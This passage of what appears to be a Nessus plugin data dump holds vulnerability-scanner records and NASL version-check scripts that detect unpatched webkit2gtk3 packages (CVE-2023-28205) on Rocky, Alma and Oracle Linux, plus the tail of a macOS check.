Checks\");\n\n script_copyright(english:\"This script is Copyright (C) 2023 and is owned by Tenable, Inc. 
or an Affiliate thereof.\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_ports(\"Host/MacOSX/Version\", \"Host/local_checks_enabled\", \"Host/MacOSX/packages/boms\");\n\n exit(0);\n}\n\ninclude('vcf.inc');\ninclude('vcf_extras_apple.inc');\n\nvar app_info = vcf::apple::macos::get_app_info();\n\nvar constraints = [\n { 'fixed_version' : '11.7.6', 'min_version' : '11.0', 'fixed_display' : 'macOS Big Sur 11.7.6' }\n];\n\nvcf::apple::macos::check_version_and_report(app_info:app_info, constraints:constraints, severity:SECURITY_HOLE);\n", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-11-12T03:35:12", "description": "The remote Rocky Linux 9 host has packages installed that are affected by a vulnerability as referenced in the RLSA-2023:1918 advisory.\n\n - A use after free issue was addressed with improved memory management. This issue is fixed in iOS 15.7.5 and iPadOS 15.7.5, Safari 16.4.1, iOS 16.4.1 and iPadOS 16.4.1, macOS Ventura 13.3.1. Processing maliciously crafted web content may lead to arbitrary code execution. Apple is aware of a report that this issue may have been actively exploited. 
(CVE-2023-28205)\n\nNote that Nessus has not tested for this issue but has instead relied only on the application's self-reported version number.", "cvss3": {}, "published": "2023-04-26T00:00:00", "type": "nessus", "title": "Rocky Linux 9 : webkit2gtk3 (RLSA-2023:1918)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2023-28205"], "modified": "2023-11-06T00:00:00", "cpe": ["p-cpe:/a:rocky:linux:webkit2gtk3", "p-cpe:/a:rocky:linux:webkit2gtk3-debuginfo", "p-cpe:/a:rocky:linux:webkit2gtk3-debugsource", "p-cpe:/a:rocky:linux:webkit2gtk3-devel", "p-cpe:/a:rocky:linux:webkit2gtk3-devel-debuginfo", "p-cpe:/a:rocky:linux:webkit2gtk3-jsc", "p-cpe:/a:rocky:linux:webkit2gtk3-jsc-debuginfo", "p-cpe:/a:rocky:linux:webkit2gtk3-jsc-devel", "p-cpe:/a:rocky:linux:webkit2gtk3-jsc-devel-debuginfo", "cpe:/o:rocky:linux:9"], "id": "ROCKY_LINUX_RLSA-2023-1918.NASL", "href": "https://www.tenable.com/plugins/nessus/174798", "sourceData": "#%NASL_MIN_LEVEL 80900\n##\n# (C) Tenable, Inc.\n#\n# The package checks in this plugin were extracted from\n# Rocky Linux Security Advisory RLSA-2023:1918.\n##\n\ninclude('compat.inc');\n\nif (description)\n{\n script_id(174798);\n script_version(\"1.1\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2023/11/06\");\n\n script_cve_id(\"CVE-2023-28205\");\n script_xref(name:\"RLSA\", value:\"2023:1918\");\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2023/05/01\");\n\n script_name(english:\"Rocky Linux 9 : webkit2gtk3 (RLSA-2023:1918)\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote Rocky Linux host is missing a security update.\");\n script_set_attribute(attribute:\"description\", value:\n\"The remote Rocky Linux 9 host has packages installed that are affected by a vulnerability as referenced in the\nRLSA-2023:1918 advisory.\n\n - A use after free issue was addressed with improved memory management. 
This issue is fixed in iOS 15.7.5\n and iPadOS 15.7.5, Safari 16.4.1, iOS 16.4.1 and iPadOS 16.4.1, macOS Ventura 13.3.1. Processing\n maliciously crafted web content may lead to arbitrary code execution. Apple is aware of a report that this\n issue may have been actively exploited. (CVE-2023-28205)\n\nNote that Nessus has not tested for this issue but has instead relied only on the application's self-reported version\nnumber.\");\n script_set_attribute(attribute:\"see_also\", value:\"https://errata.rockylinux.org/RLSA-2023:1918\");\n script_set_attribute(attribute:\"see_also\", value:\"https://bugzilla.redhat.com/show_bug.cgi?id=2185724\");\n script_set_attribute(attribute:\"solution\", value:\n\"Update the affected packages.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:F/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:F/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2023-28205\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2023/04/10\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2023/04/26\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2023/04/26\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:rocky:linux:webkit2gtk3\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:rocky:linux:webkit2gtk3-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:rocky:linux:webkit2gtk3-debugsource\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:rocky:linux:webkit2gtk3-devel\");\n 
script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:rocky:linux:webkit2gtk3-devel-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:rocky:linux:webkit2gtk3-jsc\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:rocky:linux:webkit2gtk3-jsc-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:rocky:linux:webkit2gtk3-jsc-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:rocky:linux:webkit2gtk3-jsc-devel-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:rocky:linux:9\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Rocky Linux Local Security Checks\");\n\n script_copyright(english:\"This script is Copyright (C) 2023 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/RockyLinux/release\", \"Host/RockyLinux/rpm-list\", \"Host/cpu\");\n\n exit(0);\n}\n\n\ninclude('rpm.inc');\n\nif (!get_kb_item('Host/local_checks_enabled')) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nvar os_release = get_kb_item('Host/RockyLinux/release');\nif (isnull(os_release) || 'Rocky Linux' >!< os_release) audit(AUDIT_OS_NOT, 'Rocky Linux');\nvar os_ver = pregmatch(pattern: \"Rocky(?: Linux)? release ([0-9]+(\\.[0-9]+)?)\", string:os_release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, 'Rocky Linux');\nos_ver = os_ver[1];\nif (! 
preg(pattern:\"^9([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, 'Rocky Linux 9.x', 'Rocky Linux ' + os_ver);\n\nif (!get_kb_item('Host/RockyLinux/rpm-list')) audit(AUDIT_PACKAGE_LIST_MISSING);\n\nvar cpu = get_kb_item('Host/cpu');\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif ('x86_64' >!< cpu && cpu !~ \"^i[3-6]86$\" && 's390' >!< cpu && 'aarch64' >!< cpu) audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, 'Rocky Linux', cpu);\n\nvar pkgs = [\n {'reference':'webkit2gtk3-2.36.7-1.el9_1.3', 'cpu':'aarch64', 'release':'9', 'rpm_spec_vers_cmp':TRUE},\n {'reference':'webkit2gtk3-2.36.7-1.el9_1.3', 'cpu':'i686', 'release':'9', 'rpm_spec_vers_cmp':TRUE},\n {'reference':'webkit2gtk3-2.36.7-1.el9_1.3', 'cpu':'s390x', 'release':'9', 'rpm_spec_vers_cmp':TRUE},\n {'reference':'webkit2gtk3-2.36.7-1.el9_1.3', 'cpu':'x86_64', 'release':'9', 'rpm_spec_vers_cmp':TRUE},\n {'reference':'webkit2gtk3-debuginfo-2.36.7-1.el9_1.3', 'cpu':'aarch64', 'release':'9', 'rpm_spec_vers_cmp':TRUE},\n {'reference':'webkit2gtk3-debuginfo-2.36.7-1.el9_1.3', 'cpu':'s390x', 'release':'9', 'rpm_spec_vers_cmp':TRUE},\n {'reference':'webkit2gtk3-debuginfo-2.36.7-1.el9_1.3', 'cpu':'x86_64', 'release':'9', 'rpm_spec_vers_cmp':TRUE},\n {'reference':'webkit2gtk3-debugsource-2.36.7-1.el9_1.3', 'cpu':'aarch64', 'release':'9', 'rpm_spec_vers_cmp':TRUE},\n {'reference':'webkit2gtk3-debugsource-2.36.7-1.el9_1.3', 'cpu':'s390x', 'release':'9', 'rpm_spec_vers_cmp':TRUE},\n {'reference':'webkit2gtk3-debugsource-2.36.7-1.el9_1.3', 'cpu':'x86_64', 'release':'9', 'rpm_spec_vers_cmp':TRUE},\n {'reference':'webkit2gtk3-devel-2.36.7-1.el9_1.3', 'cpu':'aarch64', 'release':'9', 'rpm_spec_vers_cmp':TRUE},\n {'reference':'webkit2gtk3-devel-2.36.7-1.el9_1.3', 'cpu':'i686', 'release':'9', 'rpm_spec_vers_cmp':TRUE},\n {'reference':'webkit2gtk3-devel-2.36.7-1.el9_1.3', 'cpu':'s390x', 'release':'9', 'rpm_spec_vers_cmp':TRUE},\n {'reference':'webkit2gtk3-devel-2.36.7-1.el9_1.3', 'cpu':'x86_64', 'release':'9', 
'rpm_spec_vers_cmp':TRUE},\n {'reference':'webkit2gtk3-devel-debuginfo-2.36.7-1.el9_1.3', 'cpu':'aarch64', 'release':'9', 'rpm_spec_vers_cmp':TRUE},\n {'reference':'webkit2gtk3-devel-debuginfo-2.36.7-1.el9_1.3', 'cpu':'s390x', 'release':'9', 'rpm_spec_vers_cmp':TRUE},\n {'reference':'webkit2gtk3-devel-debuginfo-2.36.7-1.el9_1.3', 'cpu':'x86_64', 'release':'9', 'rpm_spec_vers_cmp':TRUE},\n {'reference':'webkit2gtk3-jsc-2.36.7-1.el9_1.3', 'cpu':'aarch64', 'release':'9', 'rpm_spec_vers_cmp':TRUE},\n {'reference':'webkit2gtk3-jsc-2.36.7-1.el9_1.3', 'cpu':'i686', 'release':'9', 'rpm_spec_vers_cmp':TRUE},\n {'reference':'webkit2gtk3-jsc-2.36.7-1.el9_1.3', 'cpu':'s390x', 'release':'9', 'rpm_spec_vers_cmp':TRUE},\n {'reference':'webkit2gtk3-jsc-2.36.7-1.el9_1.3', 'cpu':'x86_64', 'release':'9', 'rpm_spec_vers_cmp':TRUE},\n {'reference':'webkit2gtk3-jsc-debuginfo-2.36.7-1.el9_1.3', 'cpu':'aarch64', 'release':'9', 'rpm_spec_vers_cmp':TRUE},\n {'reference':'webkit2gtk3-jsc-debuginfo-2.36.7-1.el9_1.3', 'cpu':'s390x', 'release':'9', 'rpm_spec_vers_cmp':TRUE},\n {'reference':'webkit2gtk3-jsc-debuginfo-2.36.7-1.el9_1.3', 'cpu':'x86_64', 'release':'9', 'rpm_spec_vers_cmp':TRUE},\n {'reference':'webkit2gtk3-jsc-devel-2.36.7-1.el9_1.3', 'cpu':'aarch64', 'release':'9', 'rpm_spec_vers_cmp':TRUE},\n {'reference':'webkit2gtk3-jsc-devel-2.36.7-1.el9_1.3', 'cpu':'i686', 'release':'9', 'rpm_spec_vers_cmp':TRUE},\n {'reference':'webkit2gtk3-jsc-devel-2.36.7-1.el9_1.3', 'cpu':'s390x', 'release':'9', 'rpm_spec_vers_cmp':TRUE},\n {'reference':'webkit2gtk3-jsc-devel-2.36.7-1.el9_1.3', 'cpu':'x86_64', 'release':'9', 'rpm_spec_vers_cmp':TRUE},\n {'reference':'webkit2gtk3-jsc-devel-debuginfo-2.36.7-1.el9_1.3', 'cpu':'aarch64', 'release':'9', 'rpm_spec_vers_cmp':TRUE},\n {'reference':'webkit2gtk3-jsc-devel-debuginfo-2.36.7-1.el9_1.3', 'cpu':'s390x', 'release':'9', 'rpm_spec_vers_cmp':TRUE},\n {'reference':'webkit2gtk3-jsc-devel-debuginfo-2.36.7-1.el9_1.3', 'cpu':'x86_64', 'release':'9', 
'rpm_spec_vers_cmp':TRUE}\n];\n\nvar flag = 0;\nforeach var package_array ( pkgs ) {\n var reference = NULL;\n var _release = NULL;\n var sp = NULL;\n var _cpu = NULL;\n var el_string = NULL;\n var rpm_spec_vers_cmp = NULL;\n var epoch = NULL;\n var allowmaj = NULL;\n var exists_check = NULL;\n if (!empty_or_null(package_array['reference'])) reference = package_array['reference'];\n if (!empty_or_null(package_array['release'])) _release = 'Rocky-' + package_array['release'];\n if (!empty_or_null(package_array['sp'])) sp = package_array['sp'];\n if (!empty_or_null(package_array['cpu'])) _cpu = package_array['cpu'];\n if (!empty_or_null(package_array['el_string'])) el_string = package_array['el_string'];\n if (!empty_or_null(package_array['rpm_spec_vers_cmp'])) rpm_spec_vers_cmp = package_array['rpm_spec_vers_cmp'];\n if (!empty_or_null(package_array['epoch'])) epoch = package_array['epoch'];\n if (!empty_or_null(package_array['allowmaj'])) allowmaj = package_array['allowmaj'];\n if (!empty_or_null(package_array['exists_check'])) exists_check = package_array['exists_check'];\n if (reference && _release && (!exists_check || rpm_exists(release:_release, rpm:exists_check))) {\n if (rpm_check(release:_release, sp:sp, cpu:_cpu, reference:reference, epoch:epoch, el_string:el_string, rpm_spec_vers_cmp:rpm_spec_vers_cmp, allowmaj:allowmaj)) flag++;\n }\n}\n\nif (flag)\n{\n security_report_v4(\n port : 0,\n severity : SECURITY_HOLE,\n extra : rpm_report_get()\n );\n exit(0);\n}\nelse\n{\n var tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, 'webkit2gtk3 / webkit2gtk3-debuginfo / webkit2gtk3-debugsource / etc');\n}\n", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-10-20T13:41:57", "description": "The remote AlmaLinux 8 host has packages installed that are affected by a vulnerability as referenced in the ALSA-2023:1919 advisory.\n\n - A use after free issue was addressed with improved 
memory management. This issue is fixed in iOS 15.7.5 and iPadOS 15.7.5, Safari 16.4.1, iOS 16.4.1 and iPadOS 16.4.1, macOS Ventura 13.3.1. Processing maliciously crafted web content may lead to arbitrary code execution. Apple is aware of a report that this issue may have been actively exploited. (CVE-2023-28205)\n\nNote that Nessus has not tested for this issue but has instead relied only on the application's self-reported version number.", "cvss3": {}, "published": "2023-04-21T00:00:00", "type": "nessus", "title": "AlmaLinux 8 : webkit2gtk3 (ALSA-2023:1919)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2023-28205"], "modified": "2023-04-21T00:00:00", "cpe": ["p-cpe:/a:alma:linux:webkit2gtk3", "p-cpe:/a:alma:linux:webkit2gtk3-devel", "p-cpe:/a:alma:linux:webkit2gtk3-jsc", "p-cpe:/a:alma:linux:webkit2gtk3-jsc-devel", "cpe:/o:alma:linux:8", "cpe:/o:alma:linux:8::appstream", "cpe:/o:alma:linux:8::baseos", "cpe:/o:alma:linux:8::highavailability", "cpe:/o:alma:linux:8::nfv", "cpe:/o:alma:linux:8::powertools", "cpe:/o:alma:linux:8::realtime", "cpe:/o:alma:linux:8::resilientstorage", "cpe:/o:alma:linux:8::sap", "cpe:/o:alma:linux:8::sap_hana", "cpe:/o:alma:linux:8::supplementary"], "id": "ALMA_LINUX_ALSA-2023-1919.NASL", "href": "https://www.tenable.com/plugins/nessus/174606", "sourceData": "#%NASL_MIN_LEVEL 80900\n##\n# (C) Tenable, Inc.\n#\n# The package checks in this plugin were extracted from\n# AlmaLinux Security Advisory ALSA-2023:1919.\n##\n\ninclude('compat.inc');\n\nif (description)\n{\n script_id(174606);\n script_version(\"1.0\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2023/04/21\");\n\n script_cve_id(\"CVE-2023-28205\");\n script_xref(name:\"ALSA\", value:\"2023:1919\");\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2023/05/01\");\n\n script_name(english:\"AlmaLinux 8 : webkit2gtk3 (ALSA-2023:1919)\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote AlmaLinux host is missing a 
security update.\");\n script_set_attribute(attribute:\"description\", value:\n\"The remote AlmaLinux 8 host has packages installed that are affected by a vulnerability as referenced in the\nALSA-2023:1919 advisory.\n\n - A use after free issue was addressed with improved memory management. This issue is fixed in iOS 15.7.5\n and iPadOS 15.7.5, Safari 16.4.1, iOS 16.4.1 and iPadOS 16.4.1, macOS Ventura 13.3.1. Processing\n maliciously crafted web content may lead to arbitrary code execution. Apple is aware of a report that this\n issue may have been actively exploited. (CVE-2023-28205)\n\nNote that Nessus has not tested for this issue but has instead relied only on the application's self-reported version\nnumber.\");\n script_set_attribute(attribute:\"see_also\", value:\"https://errata.almalinux.org/8/ALSA-2023-1919.html\");\n script_set_attribute(attribute:\"solution\", value:\n\"Update the affected packages.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:F/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:F/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2023-28205\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_cwe_id(416);\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2023/04/10\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2023/04/20\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2023/04/21\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:alma:linux:webkit2gtk3\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:alma:linux:webkit2gtk3-devel\");\n 
script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:alma:linux:webkit2gtk3-jsc\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:alma:linux:webkit2gtk3-jsc-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:alma:linux:8\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:alma:linux:8::appstream\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:alma:linux:8::baseos\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:alma:linux:8::highavailability\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:alma:linux:8::nfv\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:alma:linux:8::powertools\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:alma:linux:8::realtime\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:alma:linux:8::resilientstorage\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:alma:linux:8::sap\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:alma:linux:8::sap_hana\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:alma:linux:8::supplementary\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Alma Linux Local Security Checks\");\n\n script_copyright(english:\"This script is Copyright (C) 2023 and is owned by Tenable, Inc. 
or an Affiliate thereof.\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/AlmaLinux/release\", \"Host/AlmaLinux/rpm-list\", \"Host/cpu\");\n\n exit(0);\n}\n\n\ninclude('rpm.inc');\n\nif (!get_kb_item('Host/local_checks_enabled')) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nvar os_release = get_kb_item('Host/AlmaLinux/release');\nif (isnull(os_release) || 'AlmaLinux' >!< os_release) audit(AUDIT_OS_NOT, 'AlmaLinux');\nvar os_ver = pregmatch(pattern: \"AlmaLinux release ([0-9]+(\\.[0-9]+)?)\", string:os_release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, 'AlmaLinux');\nos_ver = os_ver[1];\nif (! preg(pattern:\"^8([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, 'AlmaLinux 8.x', 'AlmaLinux ' + os_ver);\n\nif (!get_kb_item('Host/AlmaLinux/rpm-list')) audit(AUDIT_PACKAGE_LIST_MISSING);\n\nvar cpu = get_kb_item('Host/cpu');\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif ('x86_64' >!< cpu && cpu !~ \"^i[3-6]86$\" && 's390' >!< cpu && 'aarch64' >!< cpu) audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, 'AlmaLinux', cpu);\n\nvar pkgs = [\n {'reference':'webkit2gtk3-2.36.7-1.el8_7.3', 'release':'8', 'rpm_spec_vers_cmp':TRUE},\n {'reference':'webkit2gtk3-devel-2.36.7-1.el8_7.3', 'release':'8', 'rpm_spec_vers_cmp':TRUE},\n {'reference':'webkit2gtk3-jsc-2.36.7-1.el8_7.3', 'release':'8', 'rpm_spec_vers_cmp':TRUE},\n {'reference':'webkit2gtk3-jsc-devel-2.36.7-1.el8_7.3', 'release':'8', 'rpm_spec_vers_cmp':TRUE}\n];\n\nvar flag = 0;\nforeach var package_array ( pkgs ) {\n var reference = NULL;\n var _release = NULL;\n var sp = NULL;\n var _cpu = NULL;\n var el_string = NULL;\n var rpm_spec_vers_cmp = NULL;\n var epoch = NULL;\n var allowmaj = NULL;\n var exists_check = NULL;\n if (!empty_or_null(package_array['reference'])) reference = package_array['reference'];\n if (!empty_or_null(package_array['release'])) _release = 'Alma-' + package_array['release'];\n if (!empty_or_null(package_array['sp'])) sp = 
package_array['sp'];\n if (!empty_or_null(package_array['cpu'])) _cpu = package_array['cpu'];\n if (!empty_or_null(package_array['el_string'])) el_string = package_array['el_string'];\n if (!empty_or_null(package_array['rpm_spec_vers_cmp'])) rpm_spec_vers_cmp = package_array['rpm_spec_vers_cmp'];\n if (!empty_or_null(package_array['epoch'])) epoch = package_array['epoch'];\n if (!empty_or_null(package_array['allowmaj'])) allowmaj = package_array['allowmaj'];\n if (!empty_or_null(package_array['exists_check'])) exists_check = package_array['exists_check'];\n if (reference && _release && (!exists_check || rpm_exists(release:_release, rpm:exists_check))) {\n if (rpm_check(release:_release, sp:sp, cpu:_cpu, reference:reference, epoch:epoch, el_string:el_string, rpm_spec_vers_cmp:rpm_spec_vers_cmp, allowmaj:allowmaj)) flag++;\n }\n}\n\nif (flag)\n{\n security_report_v4(\n port : 0,\n severity : SECURITY_HOLE,\n extra : rpm_report_get()\n );\n exit(0);\n}\nelse\n{\n var tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, 'webkit2gtk3 / webkit2gtk3-devel / webkit2gtk3-jsc / etc');\n}\n", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-10-20T13:39:15", "description": "The remote Oracle Linux 9 host has packages installed that are affected by a vulnerability as referenced in the ELSA-2023-1918 advisory.\n\n - A use after free issue was addressed with improved memory management. This issue is fixed in iOS 15.7.5 and iPadOS 15.7.5, Safari 16.4.1, iOS 16.4.1 and iPadOS 16.4.1, macOS Ventura 13.3.1. Processing maliciously crafted web content may lead to arbitrary code execution. Apple is aware of a report that this issue may have been actively exploited. 
(CVE-2023-28205)\n\nNote that Nessus has not tested for this issue but has instead relied only on the application's self-reported version number.", "cvss3": {}, "published": "2023-04-20T00:00:00", "type": "nessus", "title": "Oracle Linux 9 : webkit2gtk3 (ELSA-2023-1918)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2023-28205"], "modified": "2023-09-18T00:00:00", "cpe": ["cpe:/o:oracle:linux:9", "p-cpe:/a:oracle:linux:webkit2gtk3", "p-cpe:/a:oracle:linux:webkit2gtk3-devel", "p-cpe:/a:oracle:linux:webkit2gtk3-jsc", "p-cpe:/a:oracle:linux:webkit2gtk3-jsc-devel"], "id": "ORACLELINUX_ELSA-2023-1918.NASL", "href": "https://www.tenable.com/plugins/nessus/174583", "sourceData": "#%NASL_MIN_LEVEL 80900\n##\n# (C) Tenable, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from Oracle Linux Security Advisory ELSA-2023-1918.\n##\n\ninclude('compat.inc');\n\nif (description)\n{\n script_id(174583);\n script_version(\"1.1\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2023/09/18\");\n\n script_cve_id(\"CVE-2023-28205\");\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2023/05/01\");\n\n script_name(english:\"Oracle Linux 9 : webkit2gtk3 (ELSA-2023-1918)\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote Oracle Linux host is missing a security update.\");\n script_set_attribute(attribute:\"description\", value:\n\"The remote Oracle Linux 9 host has packages installed that are affected by a vulnerability as referenced in the\nELSA-2023-1918 advisory.\n\n - A use after free issue was addressed with improved memory management. This issue is fixed in iOS 15.7.5\n and iPadOS 15.7.5, Safari 16.4.1, iOS 16.4.1 and iPadOS 16.4.1, macOS Ventura 13.3.1. Processing\n maliciously crafted web content may lead to arbitrary code execution. Apple is aware of a report that this\n issue may have been actively exploited. 
(CVE-2023-28205)\n\nNote that Nessus has not tested for this issue but has instead relied only on the application's self-reported version\nnumber.\");\n script_set_attribute(attribute:\"see_also\", value:\"https://linux.oracle.com/errata/ELSA-2023-1918.html\");\n script_set_attribute(attribute:\"solution\", value:\n\"Update the affected packages.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:F/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:F/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2023-28205\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2023/04/10\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2023/04/20\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2023/04/20\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:oracle:linux:9\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:webkit2gtk3\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:webkit2gtk3-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:webkit2gtk3-jsc\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:webkit2gtk3-jsc-devel\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Oracle Linux Local Security Checks\");\n\n script_copyright(english:\"This script is Copyright (C) 2023 and is owned by Tenable, Inc. 
or an Affiliate thereof.\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/OracleLinux\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\", \"Host/local_checks_enabled\");\n\n exit(0);\n}\n\n\ninclude('rpm.inc');\n\nif (!get_kb_item('Host/local_checks_enabled')) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item('Host/OracleLinux')) audit(AUDIT_OS_NOT, 'Oracle Linux');\nvar os_release = get_kb_item(\"Host/RedHat/release\");\nif (isnull(os_release) || !pregmatch(pattern: \"Oracle (?:Linux Server|Enterprise Linux)\", string:os_release)) audit(AUDIT_OS_NOT, 'Oracle Linux');\nvar os_ver = pregmatch(pattern: \"Oracle (?:Linux Server|Enterprise Linux) .*release ([0-9]+(\\.[0-9]+)?)\", string:os_release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, 'Oracle Linux');\nos_ver = os_ver[1];\nif (! preg(pattern:\"^9([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, 'Oracle Linux 9', 'Oracle Linux ' + os_ver);\n\nif (!get_kb_item('Host/RedHat/rpm-list')) audit(AUDIT_PACKAGE_LIST_MISSING);\n\nvar cpu = get_kb_item('Host/cpu');\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif ('x86_64' >!< cpu && cpu !~ \"^i[3-6]86$\" && 'aarch64' >!< cpu) audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, 'Oracle Linux', cpu);\n\nvar pkgs = [\n {'reference':'webkit2gtk3-2.36.7-1.el9_1.3', 'cpu':'aarch64', 'release':'9', 'rpm_spec_vers_cmp':TRUE},\n {'reference':'webkit2gtk3-devel-2.36.7-1.el9_1.3', 'cpu':'aarch64', 'release':'9', 'rpm_spec_vers_cmp':TRUE},\n {'reference':'webkit2gtk3-jsc-2.36.7-1.el9_1.3', 'cpu':'aarch64', 'release':'9', 'rpm_spec_vers_cmp':TRUE},\n 